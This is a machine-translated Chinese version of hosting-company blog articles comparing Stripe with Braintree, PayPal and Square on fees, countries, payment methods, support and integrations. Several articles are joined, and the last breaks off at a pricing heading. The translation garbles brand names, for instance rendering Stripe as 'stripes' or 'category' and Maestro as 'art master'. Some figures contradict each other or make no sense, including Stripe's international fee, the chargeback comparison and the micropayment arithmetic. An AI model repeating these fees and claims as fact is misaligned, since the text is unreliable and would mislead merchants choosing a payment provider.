Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
无论选择哪一种,您都可以轻松地为在线列出的产品创建结账流程。他们实现了账单确认的自动化,并拥有先进的欺诈防范工具。
换句话说,他们提供了企业在线收款所需的一切。
Braintree 是支付处理器吗?
和你可能已经熟悉的 Stripe 一样,Braintree 帮助企业接受在线支付。支付处理器是帮助促进从一个银行账户到另一个银行账户的资金交易的第三方。
这只是 Braintree 提供的服务的一小部分。
Braintree 处理完整的在线/电子商务支付周期:
- 它通过支付网关安全地收集和保存客户的信用卡信息。
- 网关分析潜在欺诈的数据。
- 最后,它处理信息并启动从相关银行账户/信用卡到您的商家账户的转账。
您可以稍后将平台上的商户账户余额转移到一个单独的银行账户。
Braintree 是处理和接受在线支付的完整解决方案。
PayPal 和 Braintree 有什么区别?
Braintree 是 Paypal 的子公司,专注于支付网关、支付处理和商业账户。一般来说,它并不专注于点对点的资金转移或私人客户。
Braintree 帮助公司直接通过 Apple Pay、Venmo、信用卡等接收付款。
你不必重定向用户到贝宝的网站来完成他们的结帐。和 Stripe 一样,你可以直接在你的网站上安装它的支付网关。
PayPal 拥有 Braintree 吗?
Braintree logo.
从它的官方 logo 你大概能看出来,答案是肯定的。
Paypal 在 2013 年收购了 Braintree 及其团队。从 2013 年到 2015 年,它是当时 Paypal 的母公司易贝的间接子公司。
但在分拆期间,Braintree 成立了新的独立 Paypal 实体。所以直到今天,它仍然是 Paypal 的直接子公司和密切合作伙伴。
Stripe 与 Braintree:市场份额
这两种支付解决方案的最大区别之一是市场份额。根据 SimilarTech,一个追踪流行网站上使用的网络技术的网站,这些数字是非常不同的。
全球约有 25,000 家顶级网站和电子商务商店使用 Braintree。另一方面,Stripe 在全球有超过 660,000 个网站使用,使 Stripe 的市场份额略低于 20% 。
他们的流行趋势也有所不同。Stripe 的营销预算很大,集中精力扩张。他们呈上升趋势,并不断增加更多的用户。
布伦特里不太注重扩张,人气也慢慢下降。
但我们不要忘记,Braintree 的母公司 Paypal 拥有比 Stripe 更大的市场份额,其估值几乎是 Stripe 理论市值的两倍。
因此,布伦特里并不存在很快消失的风险。
定价、交易成本和费用
说到费用,布伦特里和 Stripe 实际上是一样的。大多数主要的信用卡、借记卡和数字钱包收取 2.9%的费用,外加每笔交易 0.30 美元的固定费用。
与布伦特里的母公司 Paypal 不同,布伦特里和 Stripe 都没有提供小额支付的具体费率。
但是让我们更深入一点。
这两家公司中有没有隐藏的费用或交易成本会影响平衡?
布伦特里
Braintree 在其网站上提供了有关其定价和收费政策的详细信息。如果你使用它的商业帐户,没有经常性或一次性的费用来建立一个帐户。
Braintree pricing details.
如你所见,标准费用涵盖了大多数交易——从 Venmo 和其他数字钱包到大多数主要信用卡。
国际信用卡和货币各加收 1%的费用。这使得以另一种货币进行国际支付的总费用为每笔交易 4.9%+0.30 美元。
一般费用 : 所有信用卡和支付方式的 2.9% + $0.30。
- 非美国货币+1%,美国境外信用卡+1%
- ACH 付款的 0.75%,上限为 5 美元
种类
Stripe 还在其网站上分享了深入的支付处理费用信息。使用 Stripe 处理您的付款,无需安装成本或每月重复费用。
Stripe pricing details.
同样,标准费用适用于大多数主要信用卡、Apple Pay 和其他数字钱包。
与布伦特里一样,Stripe 也对国际转账收取额外费用。国际卡和货币各加收 1%的费用。同样,用另一种货币进行国际支付的总费用是每笔交易 4.9%+0.30 美元。
一般费用:所有信用卡和支付方式的 2.9% + $0.30。
- 非美国货币+1%,美国境外信用卡+1%。
- 0.80%的 ACH 付款上限为 5 美元。
获胜者:都不是
从技术上来说,Braintree 的费用较低,在 ACH 直接银行转账中有 0.05%的差异,但这一金额对于大多数电子商务商店和在线业务来说可以忽略不计。
即使你有一个当地的企业,你的发票更喜欢 ACH 付款,5 美元的上限基本上意味着你将支付更大的发票的确切费用。
争议和退款费用
当涉及到电子商务时,争议和退款是一个不幸的现实。这不仅冻结了交易的初始资金,而且大多数支付处理器还向商家收取额外的费用。
通常,拒付发生在信用卡欺诈和未授权支付的情况下。无论支付网关的反欺诈算法有多先进,都不可能消除争议。
虽然 Braintree 是一家 Paypal 公司,但它的退款费用便宜 5 美元,每笔交易 15 美元。
这与 Stripe 的争议费相同,也是每笔交易 15 美元。
扣款费用:
- 条带化 : $15 退款
- 布伦特里 : $15 退款
虽然两者都比 Paypal 便宜,但 15 美元仍占电子商务交易的 90%以上。答案是从一开始就防止欺诈交易的发生。
Stripe 提供了名为 Stripe Radar 的下一级反欺诈解决方案,我们已经在 Kinsta 进行了深入测试。它帮助我们将欺诈性付款和退款减少了 98% !
Braintree 还提供欺诈保护,欺诈损失平均减少 60%。
获胜者:条纹
由于费用是相同的,这归结于他们的欺诈保护工具的质量。最后,15 美元比大多数交易费都要多。
这不是你想为最终甚至没有实现的付款支付的东西。如果你出售实物产品,你还会有额外的运输和产品成本损失。
这就是为什么 Stripe 的欺诈保护 Radar 让他们走在了前面。由于拥有更大的客户群,他们拥有比 Braintree 更广泛的数据集,因此能够产生更好的结果。
它几乎消除了 Kinsta 的欺诈性付款问题,也可以帮助您的业务。
退票费
经营企业的另一个现实是,有时你不得不退款。您的产品可能没有库存,或者您可能无法将产品运送到客户所在地。
谢天谢地,无论是 Stripe 还是 Braintree,退款都是免费的。坏消息是他们也不退原来的加工费。
- Stripe: 退款不收手续费,但不退原交易手续费。
- Braintree: 退款不收取任何费用,但不退还原交易费用(除非您的账户日期早于 2018 年 8 月)。
获胜者:都不是
除非你在一年前注册了 Braintree,否则在这个类别中没有明确的赢家。
支持的国家和货币
接下来,让我们看看每个提供商支持世界上的哪些国家。请注意,这些国家是企业可以设立商家账户的国家,而不是你可以接受付款的国家。
条纹:可用国家
Stripe’s available countries world map.
Stripe 商户帐户在以下国家可用*:
- 澳大利亚
- 奥地利
- 比利时
- 巴西(预览)
- 保加利亚
- 加拿大
- 塞浦路斯
- 捷克共和国
- 丹麦
- 爱沙尼亚
- 芬兰
- 法国
- 德国
- 直布罗陀(凭邀请函)
- 希腊
- 香港
- 匈牙利
- 印度(预览)
- 爱尔兰
- 意大利
- 日本
- 拉脱维亚
- 列支敦士登(仅限受邀者)
- 立陶宛
- 卢森堡
- 马来西亚
- 马耳他
- 墨西哥
- 荷兰
- 新西兰
- 挪威
- 菲律宾(仅限受邀者)
- 波兰
- 葡萄牙
- 罗马尼亚
- 新加坡
- 斯洛伐克
- 斯洛文尼亚
- 西班牙
- 瑞典
- 瑞士
- 阿拉伯联合酋长国(凭邀请函)
- 联合王国
- 美国
*请注意,在这些国家,您可以开设商家账户。您仍然可以接受来自世界任何地方的付款,只要他们使用支持方法和货币。
Stripe 在大多数西欧国家、美国、加拿大、澳大利亚和少数亚洲国家有售。
布伦特里:可用国家
Braintree—Available countries list.
您可以在以下国家注册并使用 Braintree 进行支付处理*:
- 安道尔
- 澳大利亚
- 奥地利
- 比利时
- 保加利亚
- 加拿大
- 克罗地亚
- 塞浦路斯
- 捷克共和国
- 丹麦
- 爱沙尼亚
- 芬兰
- 法国
- 德国
- 直布罗陀
- 希腊
- 根西岛
- 中国香港特别行政区
- 匈牙利
- 冰岛
- 爱尔兰
- 马恩岛
- 意大利
- 泽西岛
- 拉脱维亚
- 列支敦士登
- 立陶宛
- 卢森堡
- 马来西亚
- 马耳他
- 摩纳哥
- 荷兰
- 新西兰
- 挪威
- 波兰
- 葡萄牙
- 罗马尼亚
- 圣马力诺
- 新加坡
- 斯洛伐克
- 斯洛文尼亚
- 西班牙
- 瑞典
- 瑞士
*请注意,在这些国家,您可以开设商家账户。您仍然可以接受来自世界任何地方的付款,只要他们使用支持方法和货币。
赢家:都不是
Braintree 对欧洲的覆盖更好,Stripe 正在向南美和中亚扩张。
请记住,支持的国家列表指的是商家账户。Stripe 和 Braintree 在美国、加拿大和大多数欧洲国家都有销售。
只要使用受支持的支付方式和货币,商家就可以接受世界上任何国家的支付。
因此,除非你的企业在较小的欧洲国家(仅限布伦特里)或巴西(仅限 Stripe),否则这里没有明显的赢家。
支持的货币
Stripe 和 Braintree 都支持世界上大多数稳定的货币。从 AED 到 ZWD,两家公司都在其网站上列出了 135 种以上受支持的货币。
不管你是否需要或想要接受津巴布韦元的支付,你可能不会面临来自国际客户的任何问题。
获胜者:都不是
Stripe 和 Braintree 都支持多种货币。99%的在线企业对这两种选择都不会有问题。
经常性付款和其他付款计划
因此,我们知道,您可以选择任何一种货币进行一次性支付。
但是,经常性付款、账单和付款计划呢?
种类
Stripe 有一个单独的计费解决方案,在第一个 100 万美元后,您可以额外收取 0.5%的定期付款费用。
Stripe Billing page.
它会自动发送每月,每季度,或每年的发票给客户或客户注册。
自动发票对账从每张发票 7 美元的固定费用开始。您也可以使用条纹计费发送一次性发票。
为了创建一个分期付款计划,你需要安装一个 webhook 并定制开发与 Stripe API 一起工作的代码。
布伦特里
有了 Braintree,您可以设置重复计费,而无需注册单独的服务。
创建计划时,您可以选择付款周期数,无需任何自定义开发。这意味着您可以轻松制定支付计划,而无需 API、webhooks 或定制开发。
获胜者:布伦特里
条带计费提供了一个完整的计费解决方案,但每笔交易需要额外的费用。使用 Braintree,您可以轻松创建付款计划,无需自定义编码。
付款方式比较
现在是支付方式摊牌的时候了。哪种服务可以接受最多的信用卡、数字钱包和其他支付解决方案?
种类
首先,让我们仔细看看 Stripe 接受的支付方式。它接受所有主要的信用卡和一系列数字钱包。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
支持条纹的信用卡:
- 美国运通
- 银行卡
- 中国银联(银联杯)
- 发现和用餐者
- Interac
- 日本信用局
- 万事达信用卡
- 签证
支持条纹的数字钱包:
- 支付宝
- Apple Pay
- 点击播放
- google play
- GrabPay
- 微软支付
Stripe 还支持 ACH 传输和其他选项。
布伦特里
现在让我们深入了解一下 Braintree 支持的支付方式。它接受所有主要的信用卡,Venmo,Paypal 和一系列数字钱包。
布伦特里支持的信用卡:
- 美国运通
- 中国银联(银联杯)
- 用餐者
- 发现
- 日本信用局
- 艺术大师
- 万事达信用卡
- 签证
布伦特里支持的数字钱包:
- Apple Pay
- 点击播放
- google play
- 贝宝
- 三星支付
- 文莫
Braintree 还支持 ACH 转移和其他选项。
这两种选择涵盖了美国所有领先的信用卡提供商。
The leading US credit card companies. (Source)
如你所见,这两家供应商涵盖了美国所有主要的信用卡,即 Visa、Mastercard、Discover 和 American Express。他们支持的信用卡比美国公民还多。
他们也支持日本领先的信用卡 JCB 和中国主要的银联。
获胜者:布伦特里
Stripe 和 Braintree 支持相同的数字钱包,如 Apple Pay、Google Pay、Paypal 和 Venmo。有了支付宝,Stripe 更适合有许多中国客户的企业,而 Braintree 可能会因为 Samsung Pay 而吸引以移动用户为主的客户。
Stripe 支持更多美国商户的信用卡,而 Braintree 在欧洲的覆盖更好,包括 Maestro。请注意,Braintree 可能需要额外的流程来接受美国运通的国际交易。
结账体验和用户友好性
对于供应商来说,几乎没有什么比支付处理的结账体验更重要的了。
出色的结账体验有助于减少放弃购物车,额外的步骤会让你损失很大一部分销售额。
幸运的是,您可以使用这两种解决方案轻松创建用户友好的结账体验。
条带检出示例:Kickstarter
Kickstarter 在现场实现了 Stripe 支付网关,这意味着在结账时没有离开他们网站的重定向。
结帐页面的设计易于理解和使用。
Kickstarter checkout page.
如果你曾经在 Kickstarter 上支持过任何东西,你就已经用过 Stripe 了。
填写所需信息,然后进行结帐。确认您的订单,Stripe 将处理您的信用卡。
订单确认后,它会将您重定向到确认页面。(或者,在许多情况下,确认显示在您进行购买的同一页面上。)
这再简单不过了。
布伦特里检验示例:Bon-Ton
Paypal 的结账流程以将用户重定向到 Paypal 的网站并要求用户登录或注册而闻名。
而 Braintree 的支付网关却不是这样。
虽然你可以选择在结账页面上提供一键式 Paypal 按钮,但主要选项将是信用卡支付。
Bon-Ton checkout page.
从 Bon-Ton 的结账页面可以看到,你可以输入信用卡信息,而不会弹出或重定向。
这与 Stripe 在结账过程中采用的方法相同。我们没有发现这两个选项在用户体验上有任何明显的差异。
赢家:都不是
虽然 Paypal 和 Stripe 的结账体验有着明显的差异,但 Braintree 却是另一番景象。
需要一流的,快速的,安全的主机为您的新电子商务网站?Kinsta 提供超快的服务器和来自 WooCommerce 专家的 24/7 世界级支持。查看我们的计划
您可以让用户留在您的网站上,甚至保存信用卡数据,而无需自己处理或保护数据。
也就是说,Paypal 用户的一键式支付选项对一些企业来说可能是一个优势。
客户服务比较
支付处理是任何业务不可或缺的一部分。如果你不能成功地收到你的产品或服务的付款,你就会陷入困境。
这就是为什么客户服务在选择您的提供商时是如此重要的一个因素。
种类
Stripe 的客户支持为用户提供每周 7 天、每天 24 小时的服务。他们通过电子邮件、实时聊天和电话提供服务。
没有公开的服务电话号码,但你可以要求 Stripe 的客户服务团队打电话。
实时支持的平均等待时间为三分钟。
- 邮件:24 小时内收到回复。
- 聊天:只有英文版。平均等待时间为 3 分钟。
- 请求打电话:仅提供英文版本。平均等待时间为 3 分钟。
布伦特里
布伦特里从周一到周五提供定期支持。营业时间是从周一到周四的早上五点到午夜。
周五,布伦特里从早上 5 点到 8 点处理邮件,电话从 8 点到下午 5 点开放。
- 电子邮件:美国中部时间周一至周四上午 5 点至 12 点;星期五上午 5 时至下午 8 时
- 电话:美国中部时间周一至周四上午 8 点到 7 点;星期五上午 8 时至下午 5 时
他们还提供 24/7/365 的紧急支持,并声称随时准备好支持代表和工程师。
客户服务的社交媒体晴雨表
尽管他们声称,在社交媒体上很容易找到对两家公司的客服投诉。
Braintree customer tweet.
在这里,一个用户因为几天内没有收到回复而感到沮丧。
尽管在帖子中被贴上标签,但没有来自 Braintree 的回复或行动。
Stripe customer tweet.
在这里,一个被 Stripe 冻结了近 60,000 美元的供应商不顾一切地想要联系系统中更高层的人。总务处的特工还没能在电话里解决他的问题。
Stripe 的支持团队几乎立即取得了联系,并要求 DM 提供用户的电子邮件地址,以推动事情的发展。
赢家:条纹
Stripe 的一般支持是全天候开放的,他们还通过实时聊天甚至社交媒体处理客户支持查询。
虽然不是每个人都对这两家公司的支持感到高兴,但这是因为支付处理没有正常工作时的高风险。
分秒必争。
Stripe Connect 与布伦特里市场
Stripe 和 Braintree 都提供市场支付网关。
与常规网关的不同之处在于,它允许次级商户(例如,你的应用程序的用户)接收和处理支付。
该功能对于分布式对等商务应用和平台是必要的。(想想 Kickstarter,Patreon,Etsy 等。)
条带连接
Stripe Connect.
Stripe Connect 将自己定位为平台的支付平台。
拥有庞大的用户群、广泛的 SDK 库、优秀的文档,并且除了交易费之外没有额外的费用,很难对此提出异议。
条纹强度:
- 更大的用户群
- 更好的 API 文档
- 更广泛的 SDK 库,因此无需定制开发就能提供更好的定制选项。
布伦特里市场
Braintree Marketplace.
Braintree Marketplace 标榜自己是市场业务的可扩展解决方案。
它具有一个简单的结构,一个主账户可以为你的市场平台上的卖家创建子账户。
您可以设置子账户交易的自定义费用。
布伦特里强项:
- 结构简单。
- 子账户上的主账户。
- API 和 Ruby SDKs 的深入文档。
获胜者:条纹连接
与电子商务和 CRM 平台的集成
Stripe 和 Braintree 都支持电子商务领域的三巨头——woo commerce、 BigCommerce 和 Magento 。
伍尔科贸易公司
由于我们的用户在他们的网站上使用 WordPress,我们不能忽视这个世界上最常用的电子商务插件。我们甚至在另一篇文章中介绍了为 WordPress 设置 Stripe 的种方法。
幸运的是,WooCommerce 支持这两种支付平台。
WooCommerce extensions for payments.
WooCommerce 自动生成结账页面,你不需要定制任何代码。
WooCommerce checkout page with Stripe and Paypal options.
您还可以为您的结账流程提供多种选择。在这里,主要选择是 Stripe 支持的信用卡支付,但你也可以使用 Braintree 通过 PayPal 支付。
CRM 集成
但是说到 CRM,两者之间有更多的区别。
Stripe CRM integrations.
Stripe 提供与 Gro、Beacon CRM、Agile CRM 和其他平台的集成。如果您选择规模计划,您还可以将条带计费与 SalesForce 连接。
布伦特里的情况有所不同。
Braintree integrations with CRM.
Braintree 确实提供了大量的第三方集成。但它能直接使用的 CRM 只有 Salesforce 和 Agile CRM。
这使得 Stripe 在 CRM 和业务工具集成方面拥有明显优势。
赢家:条纹
虽然大型电子商务解决方案支持 Stripe 和 Braintree,但它归结于 CRM 集成、业务工具和重复计费选项。
Stripe 显然是这些领域的领导者,这意味着它为大多数企业提供了更好的选择。
Stripe vs Braintree:哪个更好?
在每一节的短兵相接中,都有很多平局。费用和定价结构实际上是一样的,两种结账体验都很好。
但是,凭借稍好的客户服务、欺诈保护和集成,Stripe 勉强超过了 Braintree 的终点线。
- 你是否在美国经营一家电子商务商店,大多数交易都是通过信用卡进行的?条纹是明显的选择。
- 你是否在一个欧洲国家经营一家企业,在那里许多交易都是通过 Paypal 或其他数字钱包进行的?布伦特里是个更好的选择。
Stripe 比 Braintree 好吗?
条纹比较容易上手。
有了 Braintree,你需要直接申请 Braintree 或者额外付费申请第三方商家账号。
然而,两者的结账体验是相似的,正如我们所看到的,费用实际上是一样的。不过条纹雷达的客服更好,集成选项更多,防欺诈更好的平台。
对于一家标准的美国电子商务企业来说,这使得 Stripe 成为最佳选择。
但是 Stripe 声称的相对于 Braintree 的微小优势并不意味着它在所有业务上都优于其竞争对手。
例如,Braintree 还支持 Maestro,这是一种在许多欧洲国家使用的信用卡选项,在为全球客户服务的企业中很受欢迎。
摘要
为您的企业选择支付网关和处理器不是一个你可以轻易做出的决定。在这篇文章中,我们通过强调两个可靠的市场领导者,涵盖了从费用和可用性到客户服务和集成的所有内容。
在结账体验、费用、支付方式和可用性方面,Stripe 和 Braintree 不相上下。
然而,如果你是一家 SaaS 企业,Stripe 值得一试。它拥有更好的欺诈防范工具、市场选项和集成。这使得 Stripe 更容易集成为您的 SaaS 堆栈的一部分。
总的来说,我们发现 Stripe 是电子商务企业的更好选择。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
stripe vs PayPal–你应该选择哪个支付网关?
开始一项电子商务业务是一个令人兴奋的,混乱的时代。你有很多事情要考虑:你应该使用托管平台还是用插件管理你的商店?你需要什么样的策略来提升你的销售额?
但是没有比这个问题更令人畏缩的了:你应该如何接受付款?
在你做好功课之后,你的商家 buck 将会有两个非常明确的竞争者: Stripe 和 PayPal 。提供可比较的功能,在两者之间选择感觉就像在苹果之间挑选……然而更多的苹果。这就是这篇文章的来源。
今天,我们将比较和对比这两个支付网关,并深入探讨 Stripe 与 PayPal 的争论。
Stripe vs PayPal
以下是行程安排:
Stripe 和 PayPal 是做什么的?
Stripe (成立于 2011 年)和 PayPal (成立于 1998 年)都是支付网关,充当商家和适当的信用卡网络/金融机构之间的中间人,以授权和接受支付。
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
这些错综复杂的关系会变得相当复杂。看待支付网关的一个简单方法是将其视为在商家和银行之间传递信息的使者。
以下是支付网关在电子商务网络中所处位置的直观分析。
Payment gateways (Image source: Due)
支付网关并不是接受在线支付的唯一解决方案,但它是最容易着手的选择之一。
因为与支付处理器不同,网关为你的金融数据提供了必要的武装警卫,让它在信用卡网络、你的客户和你的商店之间传递。
换句话说,在大多数情况下,它可以帮助您摆脱对 PCI 合规性的依赖。如果你决定走网关路线,你会一次又一次地遇到 Stripe 和 Paypal。还有很多其他的支付网关,比如 Authorize.Net、2Checkout、brain tree(Paypal 旗下),但是 Stripe 和 Paypal 是目前最容易使用的两个。
这也是有充分理由的:他们长期控制着市场。根据来自 Datanyze 的数据,PayPal 被 42%的市场使用。Stripe 位居第二,约占 19%。截至 2018 年 9 月,Stripe 现在估值 200 亿美元!😮2020 年, Stripe 收入较 2019 年增长 270%,达到 74 亿美元。
Stripe vs PayPal market share (Image source: Datanyze)
支付网关是用来做什么的?
首先,也是最明显的,电子商务商店使用支付网关。安德玛就是一个同时使用 Stripe 和 PayPal 的商店的例子。
Stripe and PayPal (Image source: Under Armour)
Perfmatters,一个 WordPress 性能插件是一个数字下载产品的例子,它接受两种支付网关。他们通过与 Easy Digital Downloads 电子商务插件的集成来做到这一点。
EDD accept Stripe and PayPal (Perfmatters)
你甚至可以使用这两个支付网关来接受捐赠。联合国儿童基金会,一个非盈利组织在他们的网站上这样做。
Stripe and PayPal donations (Image source: UNICEF)
(旁注:有兴趣像联合国儿童基金会一样在你的网站上接受捐款?查看我们的指南,了解如何为 Stripe 和 PayPal 设置捐赠按钮。)
你应该使用一个还是两个支付网关?
以上所有这些都回避了一个显而易见的问题:如果你可以同时使用两种支付网关,为什么还要做出选择呢?
因为除非你和安德玛、联合国儿童基金会一样大,或者精通技术,有多余的时间,否则你就是在自找麻烦。
有了两个支付网关,就会有两倍多的供应商,两倍多的事情出错,和你可能会失去来自各自网关的基于数量的折扣。如果您有一个定制的后端或其他集成,围绕您所销售的产品或服务的开发可能会将这变成一项极其复杂的任务。对小企业来说不太好或不太可行。
然而,话虽如此。有时候,拥有两个支付网关对你的企业来说可能是一个优势。尤其是在其他国家。不是每个人都有信用卡,许多消费者和博客使用贝宝余额支付一切。
运行一个或两个支付网关很大程度上取决于行业、你卖的东西和你拥有的客户类型。
现在,随着这种方式,让我们最终潜入我们的对比条纹与贝宝。
交易成本和费用
在微支付方面,PayPal 是明显的赢家,每笔微交易的收费明显低于 Stripe。小额支付通常是 10 美元以下。
Paypal 小额支付费用🏆
- 1.00 美元:1 美元的 5% = 5 且 5 + 5 = 10
- 5.00 美元:5 美元的 5% = 25 且 25 +5 = 30
条纹小额支付费用
- 1.00 美元:1 美元= 2.9 的 2.9%和 2.9 + 30 = 32.9
- 5.00 美元:5 美元的 2.9% = 14.5,14.5 +30 = 44.5
标准费用
但是假设你感兴趣的不仅仅是小额支付,情况就变得更加复杂了。
PayPal 目前的费用是每笔交易的 2.9%+0.30 美元。
PayPal fee
Stripe 的费用表也是每笔交易 2.9% + $0.30。
Stripe fees
如你所见,他们的交易费是死的,即使你已经超过了“微观”水平。但是,一旦你开始研究细则,他们的收费会有多相似呢?这就是变得更加棘手的地方。
PayPal 对资金来源于美国境外的交易收取 4.4%的费用:
PayPal international fees
这意味着,即使客户现在是美国人,但使用国际卡,你也要支付同样的交易费。
Stripe 在这方面的收费稍微温和一些,除了 0.30 美元的固定费用之外,总共收取 3.9%的费用。
Stripe international fees
那么,在交易费之战中,谁会胜出呢?除非您正在处理常规的微交易,否则在这种情况下答案是令人愉快的。
获胜者:条纹🏆
现在,让我们看看这两个巨头在争议和退款费用方面的表现。
争议和退款费用
退款对每个相关人员来说都是痛苦的。当客户开始按存储容量使用计费时,您可以预见到的不仅仅是悬而未决的付款,您还会遇到额外的费用。
PayPal 的退款和相关费用包括未经授权的交易、未收到商品的投诉,以及对商品严重偏离描述的投诉。
当他们开始退款时,金额会退还给顾客,信用卡网络会向商家收取高达 20 美元的费用。(幸运的是,如果他们后来做出对你有利的裁决,这笔费用会退还给你。)
另一方面,Stripe 采取了一种更加直截了当的方法,在他们的文档中将争议简单地归类为退款。
通过 Stripe 解决的争议还需要支付 15 美元的小额可退还费用。此外,Stripe 还为商家提供了新的、令人惊叹的 Stripe 雷达功能,帮助他们防范信用卡欺诈。在 Kinsta,我们能够防止 98%的信用卡欺诈!
获胜者:条纹🏆
如果你还没有尝试 Stripe 的新雷达功能,我们强烈建议你这样做。
但在可用性和受支持的货币方面,他们会保持这种连胜吗?
退票费
PayPal 曾经是退款类别的赢家,因为他们会退还您的原始处理费。然而,从 2019 年 10 月 11 日起,这种情况将不复存在。
PSA:从 2019 年 10 月 11 日开始,当您向客户退款时,Paypal 将不再返还处理费(2.9% + $0.30)。
由于愤怒,Paypal 在五月份撤回了决定,现在无论如何都在前进,希望你不会注意到。
钉在棺材上。再见, @PayPal 。【pic.twitter.com/sAweMHxtLn T2】号
—肖恩·麦凯布(@ Sean wes)2019 年 9 月 19 日
条纹 vs 方形:2022 年你该用哪种支付网关?
支付网关行业的顶级玩家总是在前进,这样他们才能成为第一。毕竟,如今的电子商务店主比以往任何时候都多,他们都需要一种可靠的方式来让 T2 从顾客那里收款。
当今市场上两个最成熟的支付网关选项是条形和方形。两者都为企业提供了处理在线支付的简单方法、领先的技术和大量的电子商务工具,让试图经营企业和赚钱的电子商务店主变得简单。
条纹 vs 方形:它们有什么不同?
条纹和方形有自己独特的功能,旨在满足非常不同的需求。坦率地说,这可能会让决定使用哪个支付网关变得比你希望的更难。这就是为什么我们要进行条纹对比方形对比,这样您就可以为您的小型企业做出数据驱动的决策。
你准备好了吗?让我们来看看。
条纹 vs 方形:他们做什么?
Stripe 成立于 2011 年,是一个支付网关,通过在您的商户账户和支付处理器之间转账,您可以接受信用卡支付(当面支付或在线支付)。这是使用物理信用卡终端或在线处理器来完成的。
还觉得这个概念很混乱吗?这里有一个直观的表示来帮助你:
Payment gateway process (Image source: Orioly)
Stripe 拥有基于云的基础设施,旨在提高可靠性、可扩展性和安全性。更不用说,它非常以开发者为中心,适用于商业网站和应用程序,并且植根于代码和设计。
此外,Stripe 可以作为独立的解决方案,用于那些需要发送发票和收取产品或服务付款的人。虽然这不是使用 Stripe 的最常见方式,因为大多数人都集成到电子商务网站中,但这只是使用这种灵活而强大的支付网关的另一种方式。
Stripe 的市场份额约为 20%,仅次于 Paypal()Stripe vs Paypal)一直在争夺第一的位置:
Stripe Market Share (Image source: Datanyze)
为了让你了解 Stripe 有多强大,你要知道:Lyft、亚马逊和微软等零售巨头都在使用 Stripe。谈到公司, Kinsta 也使用 Stripe 。
另一方面, Square 有点老(成立于 2009 年),从技术上来说并不是支付网关。其实更多的是一个端到端的支付处理器或者虚拟终端。此外,与可以在任何兼容平台上使用的 Stripe 不同,Square 不是一个独立的支付网关解决方案。相反,它是一个更大的电子商务解决方案的一部分。
这款软件非常通用,因为它本质上将您客户的设备变成了便携式销售点终端。正因为如此,你会经常发现 Square 的核心产品实际上是他们的个人 POS 系统。它为商家提供了一种通过使用智能设备读取信用卡或手动输入信用卡信息(亲自或通过电话)向客户收取款项的方式。
也就是说,多年来,Square 已经开始与 Stripe 等老牌公司竞争。事实上,您现在可以使用 Square 轻松地向在您的在线商店购物的客户收取费用。
条纹与方形:设置(易于使用)
条带设置
在你的网站上设置条纹支付体验从超级简单到超级复杂,取决于你需要你的支付网关来做。而这恰好是 Stripe 的卖点之一。
以开发人员为中心的焦点使您能够灵活地为客户创建定制的结账流程。借助 Stripe Elements ,借助实时验证、动态本地化、自动填充功能以及改进的格式和屏蔽,您可以确保您的客户快速、正确地输入信息。
更好的是,Stripe Elements 消除了您网站上托管支付页面的需要。取而代之的是,只需创建你自己的结帐表单,或者在你的网站上添加一个条纹捐赠按钮,就可以轻松地从人们那里收钱。
如果你没有太多的技术知识或团队中的开发人员来帮助你,不要担心。要使用 Stripe,你所要做的就是剪切一行 javaScript 并粘贴到你的网站上。如果你用的是 WordPress 的 Stripe,你所要做的就是安装一个开源的 Stripe 插件。
当您使用 Stripe 时,管理您的电子商务网站上的支付也很简单,因为它有直观的仪表板:
Stripe dashboard
快速浏览网站活动,查看实时图表,甚至查看是否有您需要的任何操作,如未解决的争议或身份验证(非常适合 最大限度地减少信用卡欺诈 )。
方形设置
另一方面,正方形的一切都以简单为中心。接受支付和管理业务所需的所有软件都在一个集中的系统中。事实上,您可以直接从 Square 帐户的仪表板访问高级报告工具、管理工时记录卡,甚至创建营销活动:
Square dashboard
至于设置 Square,有几个不同的选项。首先,您可以剪切并粘贴一段代码(就像 Stripe )并在您的网站上为客户创建一个结账选项。或者,你可以使用 WooCommerce Square 这样的插件来扩展你的电子商务平台并接受支付。
但是也许最简单的解决方案是建立你自己的weely商店。
2018 年 4 月,Square 收购了 Weebly 电子商务平台,并将其支付网关集成到其中,因此一旦您的 Weebly 网站启动并运行,就无需配置任何东西。不像的自托管 WordPress 网站,Weebly 是完全托管的,所以你永远不用担心为你的网站找到合适的虚拟主机提供商。
总之,Square 是一个简单的全渠道解决方案,适用于希望在任何地方销售产品的商家,而无需处理复杂的代码或一系列第三方集成。
获胜者:方块
条纹 vs 方形:交易费和设置成本
种类
使用 Stripe 的成本相当简单。这是一个现收现付的平台,没有注册费用,使其成为各种规模企业的负担得起的选择。
下面简单介绍一下 Stripe 的交易费:
- 基本交易:交易的 2.9%+$ 0.30。
- 国际交易:每笔交易 3.9%(可能收取转换费)。
- 大额交易:每笔交易折扣 0.8%(上限为 5 美元——支付方式包括 ACH 直接借记、ACH 贷记和电汇)。
对于每次退款,Stripe 将向您收取 15 美元的费用,除非退款决定对您有利。与除 Square 之外的其他支付网关、相比,这是非常有竞争力的。
平方
就像 Stripe 一样,Square 不收取任何注册费用,也不会将你局限于任何类型的合同。此外,他们吹嘘没有任何其他类型的隐藏费用,如授权,声明,退款,PCI 合规,名片等。
也就是说,由于 Square 同时提供面对面交易和在线交易,以及其他商业功能,使用它们会产生更多相关成本:
以下支付类型将产生 2.9% + $0.30 交易费:
- 方形发票。
- 在线 API。
- 网上商店。
- 文件支付电子商务卡。
这些支付类型将产生3.5%+0.15 美元的交易费:
- 存档卡交易。
- 在物理硬件上手动输入信用卡。
- POS API 键入付款。
- 在线手动输入信用卡。
而且,正如我们上面提到的,Square 不收取退单费,这是很罕见的,非常吸引人的。除此之外,Square 还为客户每月合格交易提供高达 250 美元的退款保护。这只是向您展示 Square 有多关心他们的客户和业务。
附加平方定价
